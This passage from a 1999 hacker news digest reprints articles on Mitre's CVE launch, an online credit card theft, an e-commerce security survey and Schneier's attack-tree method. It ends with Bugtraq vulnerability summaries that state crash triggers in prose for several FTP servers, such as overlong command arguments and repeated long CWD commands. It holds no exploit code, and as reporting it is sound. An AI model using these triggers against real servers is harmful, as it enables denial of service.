      owns the frequency, has leased 680 AM to
      Cox Radio, owner of news/talk giant
      WSB-AM (750). 
      
      Cox Radio has spearheaded
      programming, first as a sports-talk station
      (680/The Fan), then turning WCNN into a
      news/talk station in 1997. The lease
      between the two companies expires April
      2. 
      
      According to Marc Morgan, co-chief
      operating officer of Cox Radio, the
      decision to end the arrangement was
      mutual. 
      
      "When we made this [leasing] deal five
      years ago, it made great sense at the time
      and served the purpose it was meant to
      serve," he said. "There's definitely a hole in
      the market for a black talk station, and I
      think it's a good idea. ... I haven't heard it
      yet, so I couldn't even begin to speculate on
              what effect, if any, it would have on any
              other station in town."      

                            
      @HWA
      
18.0  CVE by Mitre Goes Online 
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      The Common Vulnerabilities and Exposures database run
      by Massachusetts defense contractor Mitre has gone
      online. The database hopes to help standardize
      computer security terms and set a common vocabulary
      for building more secure systems. The database hopes
      to contain all known system vulnerabilities. (It is unlikely
      that any of the big 5 security companies will give up
      new vulnerabilities that only they know about for their
      competitors to find in this database. The database is
      already missing some key advisories that have been
      publicly released.) 

      The Boston Globe
      http://www.globe.com/dailyglobe2/335/business/Handle_on_hackers%2b.shtml
      
      Common Vulnerabilities and Exposures Database 
      http://www.cve.mitre.org/
      
      Handle on hackers 

      Bedford firm seeks security standard with
      software-weakness list
 
      By Ross Kerber, Globe Staff, 12/01/99 
 
         BEDFORD - Before the invention of the periodic table in 1869, chemists
          struggled to put elements such as hydrogen and lithium into a coherent
      classification scheme.
 
      Today, parts of the field of computer science now seem stuck with the same
      lack of organization. In particular there is little agreement among software
      security specialists on just how to classify the sections of computer code that
      are often targeted by hackers.
 
      Government and academic groups have attempted to categorize these
      software Achilles' heels for years, to little commercial enthusiasm.
 
      But now some steam is gathering behind a project run by Bedford-based
      Mitre Corp. to create a simpler listing of weaknesses. The project doesn't try
      to classify codes and other security problems into families or types, but only
      to list them as part of what Mitre calls a directory of ''Common Vulnerabilities
      and Exposures.''
 
      By dumbing down its directory, known as the CVE, Mitre has persuaded 23
      organizations including Cisco Systems Inc. and IBM Corp. to participate. The
      result can be found on line at www.cve.mitre.org, and executives hope it will
      help standardize terms and set a common vocabulary for building more secure
      systems.
 
      ''The beauty of the approach we've taken is to avoid everybody arguing''
      about complicated categorizations, said Steven Christey, a software engineer
      at Mitre, a nonprofit government contractor.
 
      His colleague, David Mann, compares the CVE to the lists of individual
      elements that were drawn up long before the periodic table was accepted.
      ''To get things going scientifically we really need to start small,'' Mann said.
      ''Hopefully it will spawn more categorizations, eventually.''
 
      While software viruses are quickly studied and named, the security
      weaknesses they attack vary widely and are far more difficult to classify.
 
      Consider the various names given for a type of code used by many Web sites
      known as the ''common gateway interface,'' or cgi, generally used to connect
      the site to on-line sources such as telephone directories.
 
      Altering such code can cause big disruptions to the sites, a weakness known
      as ''CA-96.06.cgi-example
 
      code'' by CERT, a well-known computer-security center at Carnegie Mellon
      University. Meanwhile CyberSafe Corp., an Internet security firm based in
      Issaquah, Wash., discusses the same weakness as an ''HTTP `phf' Attack.''
 
      While both continue to use those names, they also have begun to include in
      their advisories the name chosen by Mitre for the condition:
      ''CVE-1999-0067,'' meaning that the problem was the 67th identified under
      the CVE effort this year.
 
      Eventually they might drop their own terminologies altogether, said Bill Fithen,
      a CERT security analyst. ''If CVE catches on, there might truly be no
      legitimate reason to continue'' using older names, he said.
 
      For Mitre, CVE represents a chance to show off the commercial benefits of
      its work for government agencies. Founded in 1958 by a group of
      researchers formerly associated with MIT's Lincoln Laboratories, Mitre has
      chiefly been known as a contractor on aerospace and classified military
      projects, with offices from Fort Leavenworth, Kan., and Washington, D.C.,
      to Seoul.
 
      The company also has branched out into the civilian sector and now runs
      research centers for the Federal Aviation Administration and the Internal
      Revenue Service. In 1996 Mitre spun off divisions that did research in space,
      environment, and telecommunications. It still has about 4,000 employees
      worldwide and reported revenue of $542 million for its latest fiscal year.
 
      At the behest of the Pentagon, Mitre several years ago began research in
      areas of ''critical infrastructure protection''; 15 of the company's employees
      now are involved in a FBI anti-hacking center in Washington, D.C.
 
      The CVE is rooted in such work, dreamed up by Mann after he was assigned
      last year to create a database to protect the company's computers.
 
      Mann wanted to automatically compare alerts issued by CERT and other
      security groups with an analysis of traffic on Mitre's computers, but Mitre's
      programmers were using different terms. ''I realized we needed a way to put
      these things together,'' said Mann, 37, who holds a doctorate in mathematics
      and once taught at a US Navy postgraduate program in California.
 
      Mann developed the idea with Christey, 32, a senior software engineer, and
      last January they presented a paper at a conference at Purdue University in
      Indiana, sparking broader commercial interest.
 
      Now many attendees of that conference are members of CVE's 25-member
      editorial board made up of software vendors, analysts, and academics, and
      headed by Christey. So far the group has agreed to assign numbers to about
      320 vulnerabilities, and hopes to get to 665 by the end of the year.
 
      Like many business consortiums, the CVE board also includes members who
      aren't so enthusiastic. Some worry their competitors will learn their secrets.
 
      ''CVE will only contain vulnerabilities that are old or not interesting,'' said
      Marcus Ranum, chief executive of closely held Network Flight Recorder in
      Woodbine, Md. To monitor possible breakthroughs Ranum has assigned an
      employee to join the CVE board, which holds conference calls periodically to
      discuss new entries. But the board member won't give away too much,
      Ranum says.
 
      ''It puts me in a delicate spot as a vendor,'' he said. ''If I were going to make
      CVE useful I'd give all my information to CVE. But then my competitors
      would have it and my shareholders would kill me.''
 
      But other CVE participants say they hope the list will demystify their work to
      corporate customers and boost sales.
 
      ''Generally people can get pretty confused when you try to sell them
      software,'' said Andre Frech, a researcher at Internet Security Systems in
      Atlanta, which recently began including CVE numbers in a detection
      database.
 
      Internet Security Systems' founder, Christopher Klaus, says the CVE might
      someday even become the basis of ''hacker insurance'' policies for companies
      to minimize the impact of technical disruptions. Without CVE or something
      like it, he said, ''it would be hard even to set the premiums ... because people
      couldn't be specific enough about what they might be selling.''
 
      If CVE catches on, it will please specialists who have tried to develop more
      complex classification schemes with little notice, like Eugene Spafford, a
      computer scientist at Purdue who ran the conference where Mann and
      Christey first presented their paper.
 
      Four years ago Spafford began building his own open database of computer
      security flaws, but found few companies could agree on organizing criteria. In
      contrast, he said, CVE has already achieved ''a lot more buy-in than has
      happened in the past.''
 
      This story ran on page C01 of the Boston Globe on 12/01/99. 
      � Copyright 1999 Globe Newspaper Company. 
      
      @HWA
      
      
19.0  Novell Head Victim of Online Credit Card Theft 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 

      contributed by Weld Pond 
      Novell chief Eric Schmidt has admitted that he has been
      the victim of credit card theft. Speaking at San
      Francisco's Digital Economy conference he blamed the
      theft of his personal information on browser cookies. He
      labeled cookies as "the biggest disaster for computers in
      the past [few] years." 

      ZD Net       
      http://www.zdnet.com/zdnn/stories/news/0,4586,2403346,00.html?chkpt=zdnntop
      
      Novell chief's credit card stolen online

      Eric Schmidt blames cookies for cyber theft --
      calls cookies 'one of the biggest disasters for
      computers.'
      
      
      
      By Ben Elgin, Sm@rt Reseller
      UPDATED December 2, 1999 3:26 PM PT 
      
      
      Novell chief Eric Schmidt knows firsthand the
      problem of Internet fraud. 
      
      Speaking at San Francisco's Digital Economy conference
      Thursday, Schmidt informed the crowd that his credit card
      number had been stolen over the Internet in the past. 
      
      Although he isn't sure exactly how his card number was
      lifted, Schmidt says he believes it was through a
      mechanism that reads the cookies-files sitting on a user's
      desktop and storing personal information, such as
      passwords and preferences. 
      
      "Cookies are one of the biggest disasters for computers in the
      past [several] years," says Schmidt, citing the lack of
      security and the blatant breach of consumer privacy. 
      
                       As Novell's chairman and CEO,
      Schmidt is trying to oust cookies with his company's new
      "digitalme" online identification-management service.
      Based on Novell Directory Services technology, digitalme
      is aiming to store and consolidate a user's multiple
      passwords, address books, favorites lists and purchasing
      preferences. 
      
      "Cookies are a great idea, [but] they are just stored in the
      wrong place," says Schmidt. 
      
      Schmidt's brush with cyber thieves may have left him
      wary, but not a whole lot poorer. "My liability was $50 ...
      [but] I'm not sure what the credit card company's liability
      was." he says
      
      @HWA


20.0  IDC Says E-Commerce Unsafe Most of the Time 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Deepquest 
      The most recent Technology Integration Panel Study,
      conducted by International Data Corporation paints a
      grim picture of online security. Consumers have worried
      about the security of their online transactions, and this
      study seems to justify those fears. The study, entitled
      E-Commerce Solutions: Customer Directions and
      Segmentation by Company Size and Industry" explores
      various market segments currently using e-commerce
      systems and what the potential is for the future.
      (Unfortunately the data for this study is already six
      months old and had an extremely small sample size.
      Hopefully a more comprehensive study can be
      conducted soon.) 

      South China Morning Post 
      http://www.technologypost.com/enterprise/DAILY/19991202103702261.asp?Section=Main
      
      Published on Thursday, December 2, 1999
 
      ENTERPRISE 
 
       Online transactions are
      not all secure, says study 
 
      NEWSBYTES 
 
      Consumers have worried about the security of their
      online transactions, and a new study by International
      Data Corporation (IDC) justifies their fears.
 
      According to IDC's most recent Technology Integration
      Panel Study, one in five large companies (those having
      1,000 or more employees) is likely not to have a secure
      transaction option available. In small companies, (10-99
      employees) the ratio of firms not having a secure
      transaction option rises to one in three.
 
      "Information technology is again changing the business
      landscape, offering the potential for better products and
      services delivered to corporations, governments, and
      consumers alike through the engineering of e-solutions,"
      said Carey Azzara, program director of IDC's
      "Corporate Computing: Vertical Views" research.
 
      "However, realising this potential is not easy and
      certainly not without pitfalls for the vendors trying to
      bring the world into this new paradigm."
 
      Mr Azzara emphasised the point that unless companies
      have a secure means of accepting payment for a
      transaction, whether that transaction is e-retail or
      business-to-business, they are not engaging in
      e-commerce; rather, they are engaging in e-business,
      which is not the same. 
 
      "I will pick a secure server all the time," Mr Azzara said
      when discussing how payment is be made online. Under
      no circumstances, he cautioned, should credit card
      numbers be given in a non-secure environment.
 
      In fact he would not accept a secure-transaction logo on
      a Web site, but would make sure that the online
      merchant's server was really secure with encryption and
      authentication capabilities. 
 
      Over 40 per cent of the survey's respondents reported
      that they paid a premium for better e-commerce system
      performance. The study found Microsoft had the largest
      hold on the market, but Netscape, IBM, and Oracle
      were seriously considered by 25 per cent of the
      responding companies.
 
      The full study, entitled "E-Commerce Solutions:
      Customer Directions and Segmentation by Company
      Size and Industry", explores the market segments
      currently using e-commerce systems and how the
      potential for future business is shaping up.
 
      The study, conducted during July 1999, sampled 974
      US and Canadian companies, stratified by size and
      industry, and was weighted to reflect information and
      communication technology of each marketplace.
 
      Mr Azzara said consumers should "go ahead, make the
      phone call" when passing over credit card information
      unless the security of the site was established.
 
      The message of the survey, he said, is: "Buyer beware!
      Don't be a victim."
 
      Additional information about IDC is available at
      www.idc.com. 
 
      Copyright (c) Post-Newsweek Business Information, Inc.
      All rights reserved.
      
      @HWA
      
21.0  Attack Trees Help to Model Security Threats 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      With new security weakness showing up on a daily basis
      how do you model threats against computer systems?
      Bruce Schneier has come up with a formal methodology
      for analyzing the security of systems and subsystems,
      known as 'Attack Trees'. 

      Dr. Dobb's Journal       
      http://www.ddj.com/articles/1999/9912/9912a/9912a.htm
      
       
      Attack Trees

      Dr. Dobb's Journal December 1999

      Modeling security threats

      By Bruce Schneier

      Bruce is the CTO of Counterpane Internet Security, author of Applied 
      Cryptography, Second Edition (John Wiley & Sons, 1995), and inventor of 
      the Blowfish and Twofish encryption algorithms. You can contact Bruce at 
      http:// www.counterpane.com/. 


      Few people truly understand computer security, as illustrated by 
      computer-security company marketing literature that touts "hacker proof 
      software," "triple-DES security," and the like. In truth, unbreakable 
      security is broken all the time, often in ways its designers never 
      imagined. Seemingly strong cryptography gets broken, too. Attacks thought 
      to be beyond the ability of mortal men become commonplace. And as 
      newspapers report security bug after security bug, it becomes increasingly 
      clear that the term "security" doesn't have meaning unless also you know 
      things like "Secure from whom?" or "Secure for how long?"

      Clearly, what we need is a way to model threats against computer systems. 
      If we can understand all the different ways in which a system can be 
      attacked, we can likely design countermeasures to thwart those attacks. 
      And if we can understand who the attackers are -- not to mention their 
      abilities, motivations, and goals -- maybe we can install the proper 
      countermeasures to deal with the real threats.

      Enter Attack Trees

      Attack trees provide a formal, methodical way of describing the security 
      of systems, based on varying attacks. Basically, you represent attacks 
      against a system in a tree structure, with the goal as the root node and 
      different ways of achieving that goal as leaf nodes.

      Figure 1, for instance, is a simple attack tree against a physical safe. 
      The goal is opening the safe. To open the safe, attackers can pick the 
      lock, learn the combination, cut open the safe, or install the safe 
      improperly so that they can easily open it later. To learn the 
      combination, they either have to find the combination written down or get 
      the combination from the safe owner. And so on. Each node becomes a 
      subgoal, and children of that node are ways to achieve that subgoal. (Of 
      course, this is just a sample attack tree, and an incomplete one at that. 
      How many other attacks can you think of that would achieve the goal?)

      Note that there are AND nodes and OR nodes (in the figures, everything 
      that isn't an AND node is an OR node). OR nodes are alternatives -- the 
      four ways to open a safe, for example. AND nodes represent different steps 
      toward achieving the same goal. To eavesdrop on someone saying the safe 
      combination, attackers have to eavesdrop on the conversation AND get safe 
      owners to say the combination. Attackers can't achieve the goal unless 
      both subgoals are satisfied.

      That's the basic attack tree. Once you have it completed, you can assign 
      values -- I (impossible) and P (possible) in Figure 1 -- to the various 
      leaf nodes, then make calculations about the nodes. (Again, this is only 
      an illustrative example; do not take the values as an indication of how 
      secure my safe really is.) Once you assign these values -- presumably this 
      assignment will be the result of painstaking research on the safe itself 
      -- you can calculate the security of the goal. The value of an OR node is 
      possible if any of its children are possible, and impossible if all of its 
      children are impossible. The value of an AND node is possible only if all 
      children are possible, and impossible otherwise; see Figure 2.

      The dotted lines in Figure 2 show all possible attacks -- a hierarchy of 
      possible nodes, from a leaf to the goal. In this sample system, there are 
      two possible attacks: Cutting open the safe, or learning the combination 
      by bribing the owner of the safe. With this knowledge, you know exactly 
      how to defend this system against attack.

      Assigning "possible" and "impossible" to the nodes is just one way to look 
      at the tree. Any Boolean value can be assigned to the leaf nodes and then 
      propagated up the tree structure in the same manner: easy versus 
      difficult, expensive versus inexpensive, intrusive versus nonintrusive, 
      legal versus illegal, special equipment required versus no special 
      equipment. Figure 3 shows the same tree with another Boolean node value.

      Assigning "expensive" and "not expensive" to nodes is useful, but it would 
      be better to show exactly how expensive. It is also possible to assign 
      continuous values to nodes. Figure 4 shows the tree with different costs 
      assigned to the leaf nodes. Like Boolean node values, these can propagate 
      up the tree as well. OR nodes have the value of their cheapest child; AND 
      nodes have the value of the sum of their children. In Figure 4, the costs 
      have propagated up the tree, and the cheapest attack has been highlighted.

      Again, this tree can be used to determine where a system is vulnerable. 
      Figure 5 shows all attacks that cost less than $100,000. If you are only 
      concerned with attacks that are less expensive (maybe the contents of the 
      safe are only worth $100,000), then you should only concern yourself with 
      those attacks. 

      There are many other possible continuous node values, including 
      probability of success of a given attack, likelihood that an attacker will 
      try a given attack, and so on.

      Nodes and Their Values

      In any real attack tree, nodes will have many different values 
      corresponding to many different variables, both Boolean and continuous. 
      Different node values can be combined to learn even more about a system's 
      vulnerabilities. Figure 6, for instance, determines the cheapest attack 
      requiring no special equipment. You can also find the cheapest low-risk 
      attack, most likely nonintrusive attack, best low-skill attack, cheapest 
      attack with the highest probability of success, most likely legal attack, 
      and so on. Every time you query the attack tree about a certain 
      characteristic of attack, you learn more about the system's security.

      To make this work, you must marry attack trees with knowledge about 
      attackers. Different attackers have different levels of skill, access, 
      risk aversion, money, and so on. If you're worried about organized crime, 
      you have to worry about expensive attacks and attackers who are willing to 
      go to jail. If you are worried about terrorists, you also have to worry 
      about attackers who are willing to die to achieve their goal. If you're 
      worried about bored graduate students studying the security of your 
      system, you usually don't have to worry about illegal attacks such as 
      bribery and blackmail. The characteristics of your attacker determine 
      which parts of the attack tree you have to worry about.

      Attack trees also let you play "what if" games with potential 
      countermeasures. In Figure 6, for example, the goal has a cost of $20,000. 
      This is because the cheapest attack requiring no special equipment is 
      bribing the person who knows the combination. What if you implemented a 
      countermeasure -- paying that person more so that he is less susceptible 
      to bribes? If you assume that the cost to bribe him is now $80,000 (again, 
      this is an example; in the real world you'd be expected to research 
      exactly how a countermeasure affects the node value), then the cost 
      increases to $60,000 (presumably to hire the thugs to do the threatening).

      A PGP Example

      Figure 7 is an attack tree for the popular PGP e-mail security program. 
      Since PGP is a complex program, this is a complex tree, and it's easier to 
      write it in outline form than graphically. PGP has several security 
      features, so this is only one of several attack trees for PGP. This 
      particular attack tree has "read a message encrypted with PGP" as its 
      goal. Other goals might be: "forge someone else's signature on a message," 
      "change the signature on a message," "undetectibly modify a PGP-signed or 
      PGP-encrypted message," and so on.

      What immediately becomes apparent from the attack tree is that breaking 
      the RSA or IDEA encryption algorithms are not the most profitable attacks 
      against PGP. There are many ways to read someone's PGP-encrypted messages 
      without breaking the cryptography. You can capture their screen when they 
      decrypt and read the messages (using a Trojan horse like Back Orifice, a 
      TEMPEST receiver, or a secret camera), grab their private key after they 
      enter a passphrase (Back Orifice again, or a dedicated computer virus), 
      recover their passphrase (a keyboard sniffer, TEMPEST receiver, or Back 
      Orifice), or simply try to brute force their passphrase (I can assure you 
      that it will have much less entropy than the 128-bit IDEA keys that it 
      generates). In the scheme of things, the choice of algorithm and the key 
      length is probably the least important thing that affects PGP's overall 
      security. PGP not only has to be secure, but it has to be used in an 
      environment that leverages that security without creating any new 
      insecurities.

      Creating Attack Trees

      How do you create an attack tree like this? First, you identify the 
      possible attack goals. Each goal forms a separate tree, although they 
      might share subtrees and nodes. Then, try to think of all attacks against 
      each goal. Add them to the tree. Repeat this process down the tree until 
      you are done. Give the tree to someone else, and have him think about the 
      process and add any nodes he thinks of. Repeat as necessary, possibly over 
      the course of several months. Of course there's always the chance that you 
      forgot about an attack, but you'll get better with time. Like any security 
      analysis, creating attack trees requires a certain mindset and takes 
      practice.

      Once you have the attack tree, and have researched all the node values 
      (these values will change over time, both as attacks become easier and as 
      you get more exact information on the values), you can use the attack tree 
      to make security decisions. You can look at the values of the root node to 
      see if the system's goal is vulnerable to attack. You can determine if the 
      system is vulnerable to a particular kind of attack; password guessing, 
      for instance. You can use the attack tree to list the security assumptions 
      of a system; for example, the security of PGP might assume that no one 
      could successfully bribe the programmers. You can determine the impact of 
      a system modification or a new vulnerability discovery: Recalculate the 
      nodes based on the new information and see how the goal node is affected. 
      And you can compare and rank attacks -- which is cheaper, which is more 
      likely to succeed, and the like.

      One of the surprising things that comes out of this kind of analysis is 
      that the areas people think of as vulnerable usually aren't. With PGP, for 
      example, people generally worry about key length. Should they use 1024-bit 
      RSA or 2048-bit RSA? Looking at the attack tree, though, shows that the 
      key length of RSA doesn't really matter. There are all sorts of other 
      attacks -- installing a keyboard sniffer, modifying the program on the 
      victim's hard drive -- that are much easier than breaking the RSA public 
      key. Increasing the key length from 1024 bits to 2048 bits is like putting 
      an enormous stake into the ground and hoping the enemy runs right into it, 
      as opposed to building a lower palisade around the target. Attack trees 
      give you perspective on the whole system.

      One of the things that really makes attack trees valuable is that they 
      capture knowledge in a reusable form. Once you've completed the PGP attack 
      tree, you can use it in any situation that uses PGP. The attack tree 
      against PGP becomes part of a larger attack tree. For example, Figure 8 
      shows an attack tree whose goal is to read a specific message that has 
      been sent from one Windows 98 computer to another. If you look at the root 
      nodes of the tree, the entire attack trees for PGP and for opening a safe 
      fit into this attack tree.

      This scalability means that you don't have to be an expert in everything. 
      If you're using PGP in a system, you don't have to know the details of the 
      PGP attack tree; all you need to know are the values of the root node. If 
      you're a computer-security expert, you don't have to know the details 
      about how difficult a particular model of safe is to crack; you just need 
      to know the values of the root node. Once you build up a library of attack 
      trees against particular computer programs, door and window locks, network 
      security protocols, or whatever, you can reuse them whenever you need to. 
      For a national security agency concerned about compartmentalizing attack 
      expertise, this kind of system is very useful.

      Conclusion

      Attack trees provide a formal methodology for analyzing the security of 
      systems and subsystems. They provide a way to think about security, to 
      capture and reuse expertise about security, and to respond to changes in 
      security. Security is not a product -- it's a process. Attack trees form 
      the basis of understanding that process.

      DDJ
      
      @HWA
      
22.0  Pandora Updated 
      ~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Simple Nomad 
      Jitsu-Disk finished moving the Pandora Linux code so
      that Pandora Linux uses libpcap and libnet. Pandora is a
      set of tools for testing the security and insecurity of
      Novell Netware. A number of problems have been
      corrected from the beta release on November 19th,
      including several problems involving spoofing and
      sniffing. Libnet helped Jitsu fix all that. The
      documentation has also been updated, including all the
      code used to do the builds, and pre-compiled binaries,
      all wrapped up in a nice big tarball. 

      Nomad Mobile Research Center       
      http://www.nmrc.org/pandora/
      
      @HWA    
      
23.0  [sSh] Busted or Not?  
      ~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Ender 
      Numerous contradictory information about the raids and
      arrests of YTCracker and Darkness of [sSh] have been
      received by HNN and other sources. It is pretty clear at
      this time that YTCracker has not been arrested, yet.
      (He feels that it is only a matter of time.) OSALL has
      been trying to keep track on the rumors and innuendoes
      and get accurate information regarding this breaking
      story or non-story. 

      OSALL       
      http://www.aviary-mag.com/News/SSH_Busts/ssh_busts.html
      
      
      [sSh] Busts
      12/02/99

                                                    Mike Hudack
                                                  Editor-in-Chief

      Note: The following information is presented as best as possible. 
      Contradictions have been streaming into the OSAll headquarters from two
      FBI agents, numerous Web site defacers and several other people.  All
      claim to know what�s going on, but all contradict each other.  We�re
      leaving this story intact for now, until the dust settles and we can determine
      the facts of the case, as it were.

      Correction: YTCracker has not been raided.

      OSAll spoke with YTCracker at 1:00pm eastern time, confirming that he
      had not been raided by the FBI or any other government agency.  

      Previous reports published on OSAll and HNN stated that YTCracker
      had been raided, citing rumors and, in one case on OSAll, an anonymous
      FBI source.  It appears that these reports were incorrect.

      As of right now it has been confirmed that Darkness has been visited by
      NASA investigative authorities.  FBI visits have not been confirmed but
      have been mentioned by an anonymous FBI source.

      The validity and reliability of this FBI source is being called into question as
      more evidence comes to light.

      The source expects "a number of groups to fall soon" but gave no timeline
      or even a guarentee of further arrests.

      The FBI has already seized logs relating to a number of attacks, including
      visiting an ISP that one defacer funneled his attacks through.

      Both the FBI and US Attorney�s Office have denied official comment on
      an "ongoing investigation."
      
      @HWA
      
24.0  Response to Freedom Extraordinary 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Jordan 
      Thursdays long anticipated launch of Freedom 1.0 by
      Zero Knowledge Systems has proved to be an
      extraordinary success. Freedom works seamlessly
      alongside your favorite browser and other Internet
      applications. You can surf the web, send email, chat,
      telnet, and participate in newsgroups as you normally
      would, only now with complete confidence that your
      personal information is not being collected without your
      consent. Freedom identifies you on the net with a 'nym'
      that you choose. There can be only one 'nym' so you
      may want to reserve your online identity as soon as you
      can. 

      Freedom 1.0      
      http://www.zks.net/clickthrough/click.asp?partner_id=542
      
      @HWA
      
      
      
25.0  DCypher.net Team Created 
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by dcypher 
      A team for the Hacker News Network has been created
      at DCypher.net. DCypher.Net has accepted the CS
      Group's CS-Cipher challenge and will attempt to break
      their 56 bit key using a brute force attack in a
      distributed computing effort. They promise to give the
      entire $10,500 prize to whoever actually finds the
      correct key. (Now that is a pretty strong incentive.) 

      DCypher.net
      http://www.dcypher.net/
      
      HNN Stats at DCypher.net TeamID:131

      Don't forget about our team over at SETI@Home, the
      search for extraterrestrial life. 

      SETI@Home
      http://setiathome.ssl.berkeley.edu/
      
      HNN SETI@Home Team Stats 
      http://setiathome.ssl.berkeley.edu/stats/team/team_2251.html
      
      @HWA
      
26.0  Hackers Make it to Mars 
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Desolationroad 
      At approximately 12 Noon PST on Friday December 3rd,
      1999 a 42 square foot (3.816 sq meters) extremely
      dense ball of complicated electronics will arrive at the
      end of its twelve month journey. The 1,270 pounds (576
      kg) mass of extremely sophisticated cutting edge
      technology will crash land onto the surface of an
      extraterestrial location. (Now thats a damn hack if I
      ever heard of one.) 

      Jet Propulsion Laboratory       
      http://marslander.jpl.nasa.gov/index.html
      
      @HWA
      
27.0  Security Focus Newsletter #17
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Security Focus Newsletter #17
      Table of Contents:
      
      I.   INTRODUCTION
      II.  BUGTRAQ SUMMARY
      1. NetTerm FTP Server Multiple Vulnerabilities
      2. Microsoft IE5 XML HTTP Redirect Vulnerability
      3. Sun Java IDE Webserver IP Restriction Failure Vulnerability
      4. Vermillion FTPd CWD DoS Vulnerability
      5. Mdaemon WebConfig Overflow DoS Vulnerability
      6. Cabletron SSR ARP Flood DoS Vulnerability
      7. Netscape Navigator Long ASP Argument Vulnerability
      8. Deerfield WorldClient Long URL DoS Vulnerability
      9. SCO Xsco Buffer Overflow Vulnerability
      10. SCO xlock(1) (long username) Buffer Overflow Vulnerability
      11. SCO su(1) Buffer Overflow Vulnerability
      III. PATCH UPDATES
      1. Vulnerability Patched: Linux syslogd Denial of Service
      2. Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service
      3. Vulnerability Patched: Cabletron SSR ARP Flood DoS
      4. Vulnerability Patched: SCO su(1) Buffer Overflow
      5. Vulnerability Patched:  Pine Environment Variable Expansion in
         URLS
      IV.  INCIDENTS SUMMARY
      1. Re: Port 137 and snmp scans (Thread)
      2. SunOS rpcbind scans (Thread)
      3. Re: cracker probing 1542 (Thread)
      4. Re: rpc logging (Thread)
      5. SANS and CERT ICMP advisories (Thread)
      6. Fw: unsolicited connection(s) (Thread)
      7. F5's 3DNS signature + Cisco Distrib Dir (Thread)
      8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread)
      9. BIND Scanning (Thread)
      10. sweep (Thread)
      11. pop3/imap crawler.. (Thread)
      12. UK Law & Cases Re Malicious action/attacks (Thread)
      13. cgi attack
      14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread)
      15. Port 98 scans & new 3128/8080 scans
      V. VULN-DEV RESEARCH LIST SUMMARY
      1. Re: icq accounts (Thread)
      2. Re: WordPad/riched20.dll buffer overflow (Thread)
      3. SSH exploit (Thread)
      4. lanma256.bmp/lanmannt.bmp security risk? (Thread)
      5. Re: development of wordpad exploit (Thread)
      VI.   SECURITY JOBS
         Seeking Staff:
      1. SecurityFocus.com is looking for staff writers for a Windows NT column!
      2. NYC - Internet Security Position
      3. Security Research Engineer
      VII.  SECURITY SURVEY RESULTS
      VIII. SECURITY FOCUS TOP 6 TOOLS
      1. SecurityFocus.com Pager (Win95/98/NT)
      2. Lookout (Windows 2000, Windows 95/98 and Windows NT)
      3. cgicheck99 0.4 (Any system supporting rebol)
      4. HookProtect (Windows 95/98 and Windows NT)
      5. Sun Enterprise Network Security Service Early Access 1 (Java)
      6. Pandora for Linux v4 beta 2 (Linux)
      IX. SPONSOR INFORMATION - CORE SDI
      X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
      
      
      I.   INTRODUCTION
      -----------------
      
      Welcome to the Security Focus 'week in review' newsletter issue 17
      sponsored by CORE SDI.
      
      http://www.core-sdi.com
      
      II.  BUGTRAQ SUMMARY 1999-11-21 to 1999-11-27
      ---------------------------------------------
      
      
      1. NetTerm FTP Server Multiple Vulnerabilities
      BugTraq ID: 819
      Remote: Yes
      Date Published: 1999-11-22
      Relevant URL:
      http://www.securityfocus.com/bid/819
      Summary:
      
      InterSoft's internet suite includes an FTP server which has been found to
      have numerous vulnerabilities. Among them:
      
      The default configuration allows read/write access to the root of the C:
      drive for anonymous users. This write access includes overwrite and
      delete. If the server is setup with 'out of the box' options, anonymous
      remote users have full access to the operating system files and
      executables.
      
      There is no administrator account, which means that any user with console
      access can alter the server's settings.
      
      The encryption method used on the passwords for user accounts is reported
      to be weak and easily broken.
      
      There are also multiple buffer overflows. Supplying over 1024-character
      arguments to the following commands will crash the server: dir, ls, mkdir,
      delete, and rmdir. Also, althouth the PASS buffer is truncated at 16
      characters for users with accounts, this limit is not in place for the
      anonymous user (to allow for proper entry of email addresses as passwords)
      and a 1024-byte string 'password' will crash the server if user name
      'anonymous' is supplied. It may be possible to exploit these overflows to
      run arbitrary code.
      
      
      2. Microsoft IE5 XML HTTP Redirect Vulnerability
      BugTraq ID: 815
      Remote: Yes
      Date Published: 1999-11-22
      Relevant URL:
      http://www.securityfocus.com/bid/815
      Summary:
      
      A vulnerability in the method IE5 uses to process XML data may allow a
      malicious web site owner to read files on a visiting user's computer. A
      web page may be created that contains an XML object type that contains
      instructions to read known files on a visitor's local host (and or
      domain). The IE5 client will allow the XML redirect to access files within
      its own domain.
      
      3. Sun Java IDE Webserver IP Restriction Failure Vulnerability
      BugTraq ID: 816
      Remote: Yes
      Date Published: 1999-11-23
      Relevant URL:
      http://www.securityfocus.com/bid/816
      Summary:
      
      These Java development applications include an http server for testing
      purposes. The server can be configured to only respond to requests from
      certain IP addresses, however the mechanism fails and any requests
      received are serviced. The server will allow read access to any file on
      the filesystem that it haas access to, all the way up to the root
      directory. In the Netbeans product, this is the default 'out of the box'
      configuration. In the Forte product. IP addresses must be added manually
      to a list of permitted clients. Once a single IP address is added, any
      requests regardless of source are responded to.
      
      4. Vermillion FTPd CWD DoS Vulnerability
      BugTraq ID: 818
      Remote: Yes
      Date Published: 1999-11-22
      Relevant URL:
      http://www.securityfocus.com/bid/818
      Summary:
      
      If the Vermillion FTP Daemon (VFTPD) receives three consecutive CWD
      commands with arguments of 504 characters or longer, it will crash.
      
      5. Mdaemon WebConfig Overflow DoS Vulnerability
      BugTraq ID: 820
      Remote: Unknown
